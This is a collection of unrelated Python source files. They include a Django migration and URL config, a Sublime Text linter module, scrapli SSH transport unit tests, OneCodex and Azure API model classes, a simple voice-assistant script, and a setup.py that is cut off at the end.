        ('library', '0002_item_project'),
    ]

    operations = [
        # New free-text summary column; default '' keeps existing rows valid.
        migrations.AddField(
            model_name='item',
            name='summary',
            field=models.TextField(default=''),
        ),
        # Relax the FK: items may now exist without a project (null=True);
        # deleting a project still cascades to its items.
        migrations.AlterField(
            model_name='item',
            name='project',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project'),
        ),
    ]
|
from .date_viewsets import DayTemplateRuleViewSet, RuleSetElementViewSet, \
RuleSetViewSet, BaseRuleViewSet, DateRuleViewSet
from .delta_viewsets import DeltaViewSet
from .schedule_viewsets import ScheduleViewSet, TaskViewSet
|
from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
# URL routes for this app; `name` values are used for reverse() lookups.
urlpatterns = [
    url(r'^forms/$', views.forms, name="view"),
    url(r'^board/$', views.board, name="board"),
    url(r'^config/$', views.config, name="config"),
    url(r'^$', views.main, name="main")
]

# Serve uploaded media through Django only during development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
import os
import re
import time
from functools import partial
import sublime
from . import pycodestyle as pep8
from ..worker import Worker
from ..callback import Callback
from ..persistent_list import PersistentList
from ..helpers import (
get_settings, is_code, get_view, check_linting, LINTING_ENABLED
)
from ..phantoms import Phantom
sublime_api = sublime.sublime_api
# Global linting state, keyed by view id (vid) where applicable.
ANACONDA = {
    'ERRORS': {},  # vid -> {lineno: [messages]}
    'WARNINGS': {},  # vid -> {lineno: [messages]}
    'VIOLATIONS': {},  # vid -> {lineno: [messages]}
    'UNDERLINES': {},  # vid -> [sublime.Region]
    'LAST_PULSE': time.time(),
    'ALREADY_LINTED': False,
    'DISABLED': PersistentList(),  # file names with linting disabled (persisted)
    'DISABLED_BUFFERS': []  # (window id, view id) tuples with linting disabled
}

# Gutter icon names used by the 'basic' gutter theme, per lint type.
marks = {
    'warning': 'dot',
    'violation': 'dot',
    'illegal': 'circle'
}
###############################################################################
# Classes
###############################################################################
class Linter:
    """Translates linter results into Sublime Text messages and regions."""

    def __init__(self, view):
        # view: the sublime.View being linted
        self.view = view

    def add_message(self, lineno, lines, message, messages):
        """Record *message* for *lineno*, tracking the line in *lines*."""
        # assume lineno is one-based, ST3 wants zero-based line numbers
        lineno -= 1
        lines.add(lineno)
        # capitalize for consistent display
        message = message[0].upper() + message[1:]
        # Remove trailing period from error message unless the message is "can't import ."
        if message.endswith('.') and not message.endswith("import ."):
            message = message[:-1]
        if lineno in messages:
            messages[lineno].append(message)
        else:
            messages[lineno] = [message]

    def underline_range(self, lineno, position, underlines, length=1):
        """Append one-character regions covering *length* chars at *position*
        (a column offset within the line)."""
        # assume lineno is one-based, ST3 wants zero-based line numbers
        lineno -= 1
        line = self.view.full_line(self.view.text_point(lineno, 0))
        position += line.begin()
        for i in range(length):
            region = sublime.Region(position + i)
            # only underline actual Python code, not strings/comments
            if self.is_that_code(region.begin()):
                underlines.append(sublime.Region(position + i))

    def underline_regex(self, **kwargs):
        """Underline matches of kwargs['regex'] on kwargs['lineno']'s line.

        Optional 'linematch' first narrows the text to its named 'match'
        group (bailing out if it does not match); 'wordmatch' keeps only
        hits whose named 'underline' group equals it.
        """
        # assume lineno is one-based, ST3 wants zero-based line numbers
        offset = 0
        lineno = kwargs.get('lineno', 1) - 1
        kwargs.get('lines', set()).add(lineno)
        line = self.view.full_line(self.view.text_point(lineno, 0))
        line_text = self.view.substr(line)
        if kwargs.get('linematch') is not None:
            match = re.match(kwargs['linematch'], line_text)
            if match is not None:
                line_text = match.group('match')
                offset = match.start('match')
            else:
                return
        iters = re.finditer(kwargs.get('regex'), line_text)
        results = [
            (r.start('underline'), r.end('underline')) for r in iters if (
                kwargs.get('wordmatch') is None or
                r.group('underline') == kwargs.get('wordmatch')
            )
        ]
        # make the lineno one-based again for underline_range
        lineno += 1
        for start, end in results:
            self.underline_range(
                lineno, start + offset, kwargs['underlines'], end - start
            )

    def is_that_code(self, point):
        """Determines if the given point is inside real Python code
        (not a string or a comment)."""
        matcher = 'source.python - string - comment'
        return self.view.match_selector(point, matcher)

    def parse_errors(self, errors):
        """Parse errors returned from the PyFlakes and pep8 libraries.

        Returns {'lines': set of zero-based linenos, 'results': per-level
        messages and underline regions}.  The per-view message dicts in
        ANACONDA must already exist for this view id (parse_results
        initializes them before calling this).
        """
        vid = self.view.id()
        errors_level = {
            'E': {'messages': ANACONDA.get('ERRORS')[vid], 'underlines': []},
            'W': {'messages': ANACONDA.get('WARNINGS')[vid], 'underlines': []},
            'V': {
                'messages': ANACONDA.get('VIOLATIONS')[vid], 'underlines': []
            }
        }
        lines = set()
        if errors is None:
            return {'lines': lines, 'results': errors_level}
        ignore_star = get_settings(self.view, 'pyflakes_ignore_import_*', True)
        for error in errors:
            try:
                # skip lines explicitly marked with '# noqa'
                line_text = self.view.substr(self.view.full_line(
                    self.view.text_point(error['lineno']-1, 0)
                ))
                if '# noqa' in line_text:
                    continue
            except Exception as e:
                # best-effort: if the line can't be read, still report the error
                print(e)
            error_level = error.get('level', 'W')
            messages = errors_level[error_level]['messages']
            underlines = errors_level[error_level]['underlines']
            if 'raw_error' not in error:
                error['raw_error'] = error['message']
            if 'import *' in error['raw_error'] and ignore_star:
                continue
            self.add_message(
                error['lineno'], lines, error['raw_error'], messages
            )
            # choose the underline strategy the error descriptor asks for
            if error['underline_range'] is True:
                self.underline_range(
                    error['lineno'], error['offset'], underlines
                )
            elif error.get('len') is not None and error.get('regex') is None:
                self.underline_range(
                    error['lineno'], error['offset'],
                    underlines, error['len']
                )
            else:
                self.underline_regex(
                    lines=lines, underlines=underlines, **error
                )
        return {'lines': lines, 'results': errors_level}
###############################################################################
# Global functions
###############################################################################
def erase_lint_marks(view):
    """Remove every lint decoration (phantoms, underlines, outlines)."""
    if get_settings(view, 'anaconda_linter_phantoms', False):
        Phantom().clear_phantoms(view)
    for mark_type in ('illegal', 'warning', 'violation'):
        view.erase_regions('anaconda-lint-underline-{}'.format(mark_type))
        view.erase_regions('anaconda-lint-outlines-{}'.format(mark_type))
def add_lint_marks(view, lines, **errors):
    """Adds lint marks to view on the given lines.

    *errors* must supply 'error_underlines', 'warning_underlines' and
    'violation_underlines' lists of sublime.Region objects; *lines* is the
    set of zero-based line numbers that carry messages.
    """
    erase_lint_marks(view)
    types = {
        'warning': errors['warning_underlines'],
        'illegal': errors['error_underlines'],
        'violation': errors['violation_underlines'],
    }
    style = get_settings(view, 'anaconda_linter_mark_style', 'outline')
    show_underlines = get_settings(view, 'anaconda_linter_underlines', True)
    if show_underlines:
        for type_name, underlines in types.items():
            if len(underlines) > 0:
                view.add_regions(
                    'anaconda-lint-underline-{}'.format(type_name), underlines,
                    'anaconda.underline.{}'.format(type_name),
                    flags=sublime.DRAW_EMPTY_AS_OVERWRITE
                )
    if len(lines) > 0:
        # map configurable outline style names to ST3 draw flags
        outline_style = {
            'solid_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SOLID_UNDERLINE, # noqa
            'stippled_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_STIPPLED_UNDERLINE, # noqa
            'squiggly_underline': sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SQUIGGLY_UNDERLINE, # noqa
            'outline': sublime.DRAW_OUTLINED,
            'none': sublime.HIDDEN,
            'fill': None  # None -> omit the flags arg, ST3 default filled style
        }
        gutter_theme = get_settings(
            view, 'anaconda_gutter_theme', 'basic').lower()
        # package directory name, needed to build the icon resource path
        package_name = os.path.dirname(__file__).rsplit(os.path.sep, 3)[1]
        ico_path = (
            'Packages/' + package_name + '/anaconda_lib/linting/'
            'gutter_mark_themes/{theme}-{type}.png'
        )
        # optionally render the messages inline as phantoms
        if get_settings(view, 'anaconda_linter_phantoms', False):
            phantom = Phantom()
            vid = view.id()
            phantoms = []
            for level in ['ERRORS', 'WARNINGS', 'VIOLATIONS']:
                for line, messages in ANACONDA.get(level)[vid].items():
                    for message in messages:
                        phantoms.append({
                            "line": line,
                            "level": level.lower(),
                            "messages": message
                        })
            phantom.update_phantoms(view, phantoms)
        for lint_type, lints in get_outlines(view).items():
            if len(lints) > 0:
                if get_settings(view, 'anaconda_gutter_marks', False):
                    if gutter_theme == 'basic':
                        gutter_marks = marks[lint_type]
                    else:
                        gutter_marks = ico_path.format(theme=gutter_theme,
                                                       type=lint_type)
                else:
                    gutter_marks = ''
                args = [
                    'anaconda-lint-outlines-{}'.format(lint_type),
                    lints,
                    'anaconda.outline.{}'.format(lint_type),
                    gutter_marks
                ]
                draw_style = outline_style.get(style, sublime.DRAW_OUTLINED)
                if draw_style is not None:
                    args.append(draw_style)
                view.add_regions(*args)
def get_outlines(view):
    """Return full-line outline regions for each lint type in *view*."""
    vid = view.id()

    def full_lines(level):
        return [
            view.full_line(view.text_point(lineno, 0))
            for lineno in ANACONDA.get(level)[vid]
        ]

    return {
        'warning': full_lines('WARNINGS'),
        'illegal': full_lines('ERRORS'),
        'violation': full_lines('VIOLATIONS'),
    }
def last_selected_lineno(view):
    """Return the zero-based row of the first selection's end point.

    Returns None when the view has no selection.  Previously an empty
    selection raised IndexError on ``sel[0]``; it now returns None too.
    """
    sel = view.sel()
    if sel is None or len(sel) == 0:
        return None
    return view.rowcol(sel[0].end())[0]
def update_statusbar(view):
    """Show the current line's lint messages in the status bar."""
    messages = get_lineno_msgs(view, last_selected_lineno(view))
    if messages:
        view.set_status('Linter', '; '.join(messages))
    else:
        view.erase_status('Linter')
def get_lineno_msgs(view, lineno):
    """Collect all error, warning and violation messages for *lineno*."""
    collected = []
    if lineno is not None:
        vid = view.id()
        for level in ('ERRORS', 'WARNINGS', 'VIOLATIONS'):
            per_view = ANACONDA.get(level)
            if vid in per_view:
                collected.extend(per_view[vid].get(lineno, []))
    return collected
def run_linter(view=None, hook=None):
    """Run the linter for the given view (defaults to the active one).

    Collects the per-view lint settings, ships the buffer to the anaconda
    worker, and routes the response to ``parse_results`` — either directly
    or through *hook* when one is supplied.
    """
    if view is None:
        view = sublime.active_window().active_view()
    window_view = (sublime.active_window().id(), view.id())
    # honor per-file and per-buffer "disable linting" toggles
    if (view.file_name() in ANACONDA['DISABLED']
            or window_view in ANACONDA['DISABLED_BUFFERS']):
        erase_lint_marks(view)
        return
    # snapshot of all linter settings for this view, sent with the request
    settings = {
        'pep8': get_settings(view, 'pep8', True),
        'pep8_ignore': get_settings(view, 'pep8_ignore', []),
        'pep8_max_line_length': get_settings(
            view, 'pep8_max_line_length', pep8.MAX_LINE_LENGTH),
        'pep8_error_levels': get_settings(view, 'pep8_error_levels', None),
        'pyflakes_ignore': get_settings(view, 'pyflakes_ignore', []),
        'pyflakes_disabled': get_settings(
            view, 'pyflakes_disabled', False),
        'use_pylint': get_settings(view, 'use_pylint', False),
        'use_pep257': get_settings(view, 'pep257', False),
        'validate_imports': get_settings(view, 'validate_imports', False),
        'pep257_ignore': get_settings(view, 'pep257_ignore', []),
        'pep8_rcfile': get_settings(view, 'pep8_rcfile'),
        'pylint_rcfile': get_settings(view, 'pylint_rcfile'),
        'pylint_ignores': get_settings(view, 'pylint_ignore'),
        'pyflakes_explicit_ignore': get_settings(
            view, 'pyflakes_explicit_ignore', []),
        'use_mypy': get_settings(view, 'mypy', False),
        'mypy_settings': get_mypy_settings(view),
        'mypypath': get_settings(view, 'mypy_mypypath', ''),
        'python_interpreter': get_settings(view, 'python_interpreter', ''),
    }
    # the whole buffer is linted, not just the saved file
    text = view.substr(sublime.Region(0, view.size()))
    data = {
        'vid': view.id(),
        'code': text,
        'settings': settings,
        'filename': view.file_name(),
        'method': 'lint',
        'handler': 'python_linter'
    }
    if hook is None:
        Worker().execute(Callback(on_success=parse_results), **data)
    else:
        Worker().execute(Callback(partial(hook, parse_results)), **data)
def get_mypy_settings(view):
    """Build the mypy command line options list from the view's settings."""
    mypy_settings = []
    if get_settings(view, 'mypy_silent_imports', False):
        mypy_settings.append('--ignore-missing-imports')
        mypy_settings.append('--follow-imports=skip')
    if get_settings(view, 'mypy_almost_silent', False):
        mypy_settings.append('--follow-imports=error')
    if get_settings(view, 'mypy_py2', False):
        mypy_settings.append('--py2')
    if get_settings(view, 'mypy_disallow_untyped_calls', False):
        mypy_settings.append('--disallow-untyped-calls')
    if get_settings(view, 'mypy_disallow_untyped_defs', False):
        mypy_settings.append('--disallow-untyped-defs')
    if get_settings(view, 'mypy_check_untyped_defs', False):
        mypy_settings.append('--check-untyped-defs')
    if get_settings(view, 'mypy_fast_parser', False):
        mypy_settings.append('--fast-parser')
    custom_typing = get_settings(view, 'mypy_custom_typing', None)
    if custom_typing is not None:
        mypy_settings.append('--custom-typing')
        mypy_settings.append(custom_typing)
    mypy_settings.append('--incremental')  # use cache always
    # NOTE(review): the final element is a boolean, not a CLI flag — it looks
    # intentional (presumably popped by the worker as a "suppress stub
    # warnings" switch rather than passed to mypy); confirm before changing.
    mypy_settings.append(
        get_settings(view, 'mypy_suppress_stub_warnings', False)
    )
    return mypy_settings
def parse_results(data, code='python'):
    """Parse the lint results from the server and paint them into the view.

    *data* is the worker response dict (expects 'vid', 'success', 'errors');
    *code* is the language the view must still contain.
    """
    view = get_view(sublime.active_window(), data['vid'])
    # NOTE(review): precedence here is `(data and not success) or not is_code`
    # — when only `not is_code` is true, data['errors'] may still be printed
    # for a successful lint; confirm this is the intended behavior.
    if data and data['success'] is False or not is_code(view, code, True):
        if get_settings(view, 'use_pylint', False) is True:
            for p in data['errors']:
                print(p)
        return
    # Check if linting was disabled between now and when the request was sent
    # to the server.
    window_view = (sublime.active_window().id(), view.id())
    if (not check_linting(view, LINTING_ENABLED) or
            view.file_name() in ANACONDA['DISABLED']
            or window_view in ANACONDA['DISABLED_BUFFERS']):
        return
    vid = view.id()
    # reset the per-view message stores before Linter.parse_errors refills them
    ANACONDA['ERRORS'][vid] = {}
    ANACONDA['WARNINGS'][vid] = {}
    ANACONDA['VIOLATIONS'][vid] = {}
    results = Linter(view).parse_errors(data['errors'])
    errors = results['results']
    lines = results['lines']
    # flat list of every underline region for this view (all levels)
    ANACONDA['UNDERLINES'][vid] = errors['E']['underlines'][:]
    ANACONDA['UNDERLINES'][vid].extend(errors['V']['underlines'])
    ANACONDA['UNDERLINES'][vid].extend(errors['W']['underlines'])
    errors = {
        'error_underlines': errors['E']['underlines'],
        'warning_underlines': errors['W']['underlines'],
        'violation_underlines': errors['V']['underlines']
    }
    add_lint_marks(view, lines, **errors)
    update_statusbar(view)
|
import pty
from io import BytesIO
import pytest
from scrapli.exceptions import (
ScrapliConnectionError,
ScrapliConnectionNotOpened,
ScrapliUnsupportedPlatform,
)
from scrapli.transport.plugins.system.ptyprocess import PtyProcess
from scrapli.transport.plugins.system.transport import SystemTransport
def test_unsupported_platform(monkeypatch, base_transport_args, system_transport_plugin_args):
    """SystemTransport must refuse to be built on non-POSIX platforms."""
    monkeypatch.setattr("sys.platform", "win")
    with pytest.raises(ScrapliUnsupportedPlatform):
        SystemTransport(
            plugin_transport_args=system_transport_plugin_args,
            base_transport_args=base_transport_args,
        )
def test_build_open_cmd(system_transport):
    """_build_open_cmd honors key/strict-key/config args plus extra open_cmd options."""
    plugin_args = system_transport.plugin_transport_args
    plugin_args.auth_private_key = "private_key"
    plugin_args.auth_strict_key = False
    plugin_args.ssh_config_file = "ssh_config"
    system_transport._base_transport_args.transport_options = {
        "open_cmd": ["somearg", "anotherarg"]
    }

    system_transport._build_open_cmd()

    expected = ["ssh", "localhost", "-p", "22"]
    expected += ["-o", "ConnectTimeout=10", "-o", "ServerAliveInterval=30"]
    expected += ["-i", "private_key", "-l", "scrapli"]
    expected += ["-o", "StrictHostKeyChecking=no"]
    expected += ["-o", "UserKnownHostsFile=/dev/null"]
    expected += ["-F", "ssh_config"]
    expected += ["somearg", "anotherarg"]
    assert system_transport.open_cmd == expected
def test_build_open_cmd_alternate_options(system_transport):
    """_build_open_cmd with strict key checking and a string open_cmd option."""
    plugin_args = system_transport.plugin_transport_args
    plugin_args.auth_private_key = "private_key"
    plugin_args.auth_strict_key = True
    plugin_args.ssh_known_hosts_file = "ssh_known_hosts"
    system_transport._base_transport_args.transport_options = {"open_cmd": "additional_cmd"}

    system_transport._build_open_cmd()

    expected = ["ssh", "localhost", "-p", "22"]
    expected += ["-o", "ConnectTimeout=10", "-o", "ServerAliveInterval=30"]
    expected += ["-i", "private_key", "-l", "scrapli"]
    expected += ["-o", "StrictHostKeyChecking=yes"]
    expected += ["-o", "UserKnownHostsFile=ssh_known_hosts"]
    expected += ["-F", "/dev/null"]
    expected += ["additional_cmd"]
    assert system_transport.open_cmd == expected
def test_close(fs, monkeypatch, system_transport):
    """close() should close the pty session and null out the reference."""
    def _close(cls):
        pass

    # stub out PtyProcess.close so no real pty teardown happens
    monkeypatch.setattr(
        "scrapli.transport.plugins.system.ptyprocess.PtyProcess.close",
        _close,
    )
    # giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
    # if its really necessary, but it *does* need a fd of some sort so whatever
    fs.create_file("dummy")
    dummy_file = open("dummy")
    system_transport.session = PtyProcess(pid=0, fd=dummy_file.fileno())
    system_transport.close()
    assert system_transport.session is None
def test_isalive_no_session(system_transport):
    """isalive() is False before any session has been opened."""
    alive = system_transport.isalive()
    assert alive is False
def test_isalive(fs, system_transport):
    """isalive() is True when the session wraps a live (forked) pty child."""
    # lie and pretend the session is already assigned
    # giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
    # if its really necessary, but it *does* need a fd of some sort so whatever; also give it a
    # forked pid so that the isalive method works... obviously this is sorta cheating to force it
    # to work but we really only care that scrapli does the right thing... we have faith that
    # ptyprocess will be doing the right thing "below" scrapli
    dummy_pid, fd = pty.fork()
    fs.create_file("dummy")
    dummy_file = open("dummy")
    system_transport.session = PtyProcess(pid=dummy_pid, fd=dummy_file.fileno())
    assert system_transport.isalive() is True
def test_read(fs, monkeypatch, system_transport):
    """read() returns whatever PtyProcess.read yields."""
    def _read(cls, _):
        return b"somebytes"

    # stub the pty read so no real terminal I/O happens
    monkeypatch.setattr(
        "scrapli.transport.plugins.system.ptyprocess.PtyProcess.read",
        _read,
    )
    # lie and pretend the session is already assigned
    # giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
    # if its really necessary, but it *does* need a fd of some sort so whatever
    dummy_pid, fd = pty.fork()
    fs.create_file("dummy")
    dummy_file = open("dummy")
    system_transport.session = PtyProcess(pid=dummy_pid, fd=dummy_file.fileno())
    assert system_transport.read() == b"somebytes"
def test_read_exception_not_open(system_transport):
    """Reading before open() must raise ScrapliConnectionNotOpened."""
    with pytest.raises(ScrapliConnectionNotOpened):
        _ = system_transport.read()
def test_read_exception_eof(fs, monkeypatch, system_transport):
    """An EOF from the pty must be re-raised as ScrapliConnectionError."""
    def _read(cls, _):
        raise EOFError

    # force the pty read to signal end-of-file
    monkeypatch.setattr(
        "scrapli.transport.plugins.system.ptyprocess.PtyProcess.read",
        _read,
    )
    # lie and pretend the session is already assigned
    # giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
    # if its really necessary, but it *does* need a fd of some sort so whatever
    fs.create_file("dummy")
    dummy_file = open("dummy")
    system_transport.session = PtyProcess(pid=0, fd=dummy_file.fileno())
    with pytest.raises(ScrapliConnectionError):
        system_transport.read()
def test_write(system_transport):
    """write() passes the bytes payload straight through to the session."""
    buf = BytesIO()
    system_transport.session = buf
    system_transport.write(b"blah")
    buf.seek(0)
    assert buf.read() == b"blah"
def test_write_exception(system_transport):
    """Writing before open() must raise ScrapliConnectionNotOpened.

    Consistency fix: pass bytes (the transport's payload type, as in
    test_write) rather than a str; the exception fires before the payload
    is used, but the call should still model a valid payload.
    """
    with pytest.raises(ScrapliConnectionNotOpened):
        system_transport.write(b"blah")
|
from onecodex.models import OneCodexBase, ResourceList
from onecodex.models.helpers import ResourceDownloadMixin
from onecodex.models.analysis import Analyses
class AnnotationSets(OneCodexBase, ResourceDownloadMixin):
    _resource_path = "/api/v1_experimental/annotation_sets"

    def download(self, path=None, file_obj=None, progressbar=False):
        """Download this AnnotationSet as a gzipped GenBank file.

        Parameters
        ----------
        path : `string`, optional
            Full path to save the file to. Defaults to the original filename
            in the current working directory. Existing files are never
            overwritten.
        file_obj : file-like object, optional
            Write the data into this file-like object instead of saving to a path.
        progressbar : `bool`
            Display a Click progress bar during the download?

        Returns
        -------
        `string`
            The path the file was downloaded to, if applicable; otherwise None.
        """
        default_name = "annotation_set_" + self.id + ".gbk.gz"
        return self._download(
            "download_uri",
            default_name,
            use_potion_session=False,
            path=path,
            file_obj=file_obj,
            progressbar=progressbar,
        )

    def download_csv(self, path=None, file_obj=None, progressbar=False):
        """Download this AnnotationSet as a CSV file.

        The CSV includes Annotation coordinates and sequences in both amino
        acid and nucleotide space.

        Parameters
        ----------
        path : `string`, optional
            Full path to save the file to. Defaults to the original filename
            in the current working directory. Existing files are never
            overwritten.
        file_obj : file-like object, optional
            Write the data into this file-like object instead of saving to a path.
        progressbar : `bool`
            Display a Click progress bar during the download?

        Returns
        -------
        `string`
            The path the file was downloaded to, if applicable; otherwise None.
        """
        default_name = "annotation_set_" + self.id + ".csv"
        return self._download(
            "download_csv",
            default_name,
            use_potion_session=True,
            path=path,
            file_obj=file_obj,
            progressbar=progressbar,
        )
class Assemblies(OneCodexBase, ResourceDownloadMixin):
    _resource_path = "/api/v1_experimental/assemblies"

    def download(self, path=None, file_obj=None, progressbar=False):
        """Download this Assembly as a FASTA file.

        Parameters
        ----------
        path : `string`, optional
            Full path to save the file to. If omitted, the file is saved in
            the current working directory under the server-provided name
            (taxon name and genome name, when available, followed by the
            genome UUID; ``assembly_<UUID>.fasta`` when there is no
            associated genome). Existing files are never overwritten.
        file_obj : file-like object, optional
            Write the data into this file-like object instead of saving to a path.
        progressbar : `bool`
            Display a Click progress bar during the download?

        Returns
        -------
        `string`
            The path the file was downloaded to, if applicable; otherwise None.
        """
        # `_filename=None` tells _download to keep the server's filename.
        return self._download(
            "download_uri",
            _filename=None,
            use_potion_session=False,
            path=path,
            file_obj=file_obj,
            progressbar=progressbar,
        )
class Genomes(OneCodexBase):
    _resource_path = "/api/v1_experimental/genomes"

    def __repr__(self):
        """Show the genome id, its taxon's name, and the genome name."""
        return f"<Genome {self.id} {self.taxon.name} ({self.name})>"
class Taxa(OneCodexBase):
    _resource_path = "/api/v1_experimental/taxa"

    def __repr__(self):
        # e.g. "<Taxa 562 Escherichia coli (species)>"
        return f"<Taxa {self.taxon_id} {self.name} ({self.rank})>"

    def genomes(self):
        """Return a list of all Genomes belonging to descendants of this Taxon."""
        return ResourceList(self._resource.genomes(), Genomes)

    def parents(self):
        """Return a list of all parents of this Taxon, at all ranks."""
        return ResourceList(self._resource.parents(), Taxa)
class FunctionalProfiles(Analyses):
    _resource_path = "/api/v1_experimental/functional_profiles"

    def results(self, json=True):
        """Return the complete results table for a functional analysis.

        Parameters
        ----------
        json : `bool`, optional
            Return result as JSON? Default True.

        Returns
        -------
        table : `dict` or `pd.DataFrame`
            Return a JSON object with the functional analysis results or a `pd.DataFrame` if json=False.
        """
        # Identity check on purpose: only the literal True selects the JSON form.
        if json is not True:
            return self.table()
        return self._results()

    def table(self):
        """Return the complete results table for the functional analysis.

        Returns
        -------
        table : `pd.DataFrame`
            A Pandas DataFrame of the functional results.
        """
        # Imported lazily so pandas is only required when a DataFrame is requested.
        import pandas as pd

        return pd.DataFrame(self._results()["table"])
|
import datetime
import os
import webbrowser
import pyttsx3
import pywhatkit
import speech_recognition as sr
import wikipedia
import pyjokes
# Text-to-speech engine backed by the Windows SAPI5 driver.
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
# Select the second installed voice (index 1) — assumes at least two voices
# are installed on this machine; TODO confirm on the target system.
engine.setProperty('voice', voices[1].id)
def speak(audio):
    """Speak `audio` aloud via the module-level pyttsx3 engine (blocks until done)."""
    engine.say(audio)
    engine.runAndWait()
def wishMe():
    """Greet the user according to the local time of day, then introduce the assistant."""
    hour = datetime.datetime.now().hour  # 0-23
    # Fixed: the original used `hour > 0`, so midnight (hour == 0) incorrectly
    # fell through to the evening greeting.
    if 0 <= hour < 12:
        speak("Good Morning!")
    elif 12 <= hour < 18:
        speak("Good Afternoon!")
    else:
        speak("Good Evening")
    speak("I am Kamalexa here . Please tell me How may I help You")
def takeCommand():
    """Listen on the default microphone and return the recognised text.

    Uses Google's free speech-recognition endpoint with Indian English
    ('en-in'). Returns the literal string "None" (not the None object) when
    recognition fails; callers compare against that sentinel.
    """
    r = sr.Recognizer()
    with sr.Microphone() as source:
        print("Listening...")
        audio = r.listen(source)
    try:
        print("Recognizing...")
        query = r.recognize_google(audio, language='en-in')
        print(f"User said: {query}\n")
    except Exception as e:
        # Any recognition or network failure is handled the same way:
        # prompt the user to repeat themselves.
        print("Say that again please...")
        return "None"
    return query
if __name__ == "__main__":
    # Main command loop: listen, match the query against known commands, act.
    wishMe()
    while True:
        try:
            query = takeCommand().lower()

            if 'wikipedia' in query:
                speak("Searching Wikipedia...")
                query = query.replace("wikipedia", "")
                results = wikipedia.summary(query, sentences=1)
                print(results)
                speak("According to wikipedia")
                speak(results)
            elif 'open youtube' in query:
                webbrowser.open("youtube.com")
            # Fixed: 'play music' must be tested BEFORE the generic 'play'
            # branch — 'play music' also contains 'play', so this branch was
            # previously unreachable.
            elif 'play music' in query:
                music_dir = 'D:\\Songs'  # NOTE(review): hard-coded path — confirm it exists on the target machine
                songs = os.listdir(music_dir)
                print(songs)
                os.startfile(os.path.join(music_dir, songs[0]))
            elif 'play' in query:
                query = query.replace('play', '')
                pywhatkit.playonyt(query)
                print("Playing...")
                speak("Playing...")
            elif 'open google' in query:
                webbrowser.open("google.com")
            elif 'open whatsapp' in query:
                webbrowser.open("https://web.whatsapp.com/")
            elif 'the time' in query:
                strTime = datetime.datetime.now().strftime("%H:%M:%S")
                speak(f"Sir, The time is {strTime}\n")
            elif 'open code' in query:
                codePath = "C:\\Users\\Kamalpreet Singh\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
                os.startfile(codePath)
            elif 'open linkedin' in query:
                webbrowser.open("https://www.linkedin.com/in/kamalpreet-singh-8558131a0/")
                speak("Opening your linked account")
            elif 'open facebook' in query:
                webbrowser.open("https://www.facebook.com/profile.php?id=100014358135907")
                speak("Opening Facebook")
            elif 'open twitter' in query:
                webbrowser.open("https://www.twitter.com")
                speak("Opening Twitter")
            elif 'open instagram' in query:
                webbrowser.open("https://www.instagram.com/kamalpreet__singh__/")
                speak("Opening Instagram")
            elif 'how are you' in query:
                speak("Sir I am Great")
            elif 'your name' in query:
                speak("Sir my name is Kamalexa")
            elif 'search' in query:
                query = query.replace("search", "")
                # Fixed: the URL previously contained a stray '$' (JavaScript
                # template-literal syntax) which was sent literally to Google.
                webbrowser.open(f"https://www.google.com/search?q={query}")
            elif 'tell me something funny' in query:
                # Fixed: speak() returns None, so the joke text must be
                # captured before speaking, not assigned from speak()'s result.
                joke = pyjokes.get_joke()
                print(joke)
                speak(joke)
        except Exception as e:
            # Keep the assistant alive on any error; just report it.
            print(e)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WebhookCreateOrUpdateParameters(Model):
    """The parameters supplied to the create or update webhook operation.

    All required parameters must be populated in order to send to Azure.

    :param name: Required. Gets or sets the name of the webhook.
    :type name: str
    :param is_enabled: Gets or sets the value of the enabled flag of webhook.
    :type is_enabled: bool
    :param uri: Gets or sets the uri.
    :type uri: str
    :param expiry_time: Gets or sets the expiry time.
    :type expiry_time: datetime
    :param parameters: Gets or sets the parameters of the job.
    :type parameters: dict[str, str]
    :param runbook: Gets or sets the runbook.
    :type runbook: ~azure.mgmt.automation.models.RunbookAssociationProperty
    :param run_on: Gets or sets the name of the hybrid worker group the
     webhook job will run on.
    :type run_on: str
    """

    # msrest validation rules: only `name` is mandatory.
    _validation = {
        'name': {'required': True},
    }

    # Attribute-to-wire mapping; everything except `name` is nested under the
    # JSON `properties` object.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'is_enabled': {'key': 'properties.isEnabled', 'type': 'bool'},
        'uri': {'key': 'properties.uri', 'type': 'str'},
        'expiry_time': {'key': 'properties.expiryTime', 'type': 'iso-8601'},
        'parameters': {'key': 'properties.parameters', 'type': '{str}'},
        'runbook': {'key': 'properties.runbook', 'type': 'RunbookAssociationProperty'},
        'run_on': {'key': 'properties.runOn', 'type': 'str'},
    }

    def __init__(self, *, name: str, is_enabled: bool=None, uri: str=None, expiry_time=None, parameters=None, runbook=None, run_on: str=None, **kwargs) -> None:
        super(WebhookCreateOrUpdateParameters, self).__init__(**kwargs)
        self.name = name
        self.is_enabled = is_enabled
        self.uri = uri
        self.expiry_time = expiry_time
        self.parameters = parameters
        self.runbook = runbook
        self.run_on = run_on
|
## TO TELL ME THE AGE ##
def tell_my_age(age):
    """Print the caller's age in a short sentence."""
    print(f'My age is {age}')
|
# -*- coding: utf-8 -*-
from setuptools import setup
from setuptools import Extension
import os
# Packages and data bundled into the distribution.
packages = \
['app', 'app.cython_ext', 'app.data']

# Include every non-Python file found inside each package.
package_data = \
{'': ['*']}

# Optional dependency groups, one per supported build/packaging backend.
extras_require = \
